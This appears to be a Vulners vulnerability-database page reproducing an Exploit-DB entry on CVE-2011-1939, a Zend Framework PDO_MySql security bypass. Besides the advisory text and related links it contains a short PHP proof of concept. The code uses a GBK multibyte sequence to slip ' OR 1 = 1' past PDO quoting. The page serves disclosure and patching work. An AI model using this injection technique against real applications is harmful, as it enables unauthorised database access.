Lucene search
+L

Zend Framework 1.11.4 - 'PDO_MySql' Security Bypass

🗓️ 19 May 2011 00:00:00Reported by Anthony FerraraType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 48 Views

Zend Framework 1.11.4 'PDO_MySql' Security Bypass SQL injection vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2011-1939
19 May 201100:00
circl
cve
CVE
CVE-2011-1939
26 Nov 201921:17
cve
cvelist
Cvelist
CVE-2011-1939
26 Nov 201921:17
cvelist
euvd
EUVD
EUVD-2011-1937
7 Oct 202500:30
euvd
nessus
Tenable Nessus
GLSA-201408-01 : Zend Framework: SQL injection
5 Aug 201400:00
nessus
gentoo
Gentoo Linux
Zend Framework: SQL injection
4 Aug 201400:00
gentoo
nvd
NVD
CVE-2011-1939
26 Nov 201922:15
nvd
openvas
OpenVAS
Gentoo Security Advisory GLSA 201408-01
29 Sep 201500:00
openvas
prion
Prion
Sql injection
26 Nov 201922:15
prion
ubuntucve
UbuntuCve
CVE-2011-1939
26 Nov 201922:15
ubuntucve
source: https://www.securityfocus.com/bid/47919/info

Zend Framework is prone to a security-bypass vulnerability.

An attacker can leverage this vulnerability to bypass certain security restrictions. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities.

Zend Framework versions prior to 1.10.9 and 1.11.6 are vulnerable.

$dsn = 'mysql:dbname=INFORMATION_SCHEMA;host=127.0.0.1;charset=GBK';
$pdo = new PDO($dsn, $user, $pass);
$pdo->exec('SET NAMES GBK');
$string = chr(0xbf) . chr(0x27) . ' OR 1 = 1; /*';
$sql = "SELECT TABLE_NAME
            FROM INFORMATION_SCHEMA.TABLES
            WHERE TABLE_NAME LIKE ".$pdo->quote($string).";";
$stmt = $pdo->query($sql);
var_dump($stmt->rowCount());

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jan 2015 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 27.5
CVSS 3.19.8
EPSS0.03858
48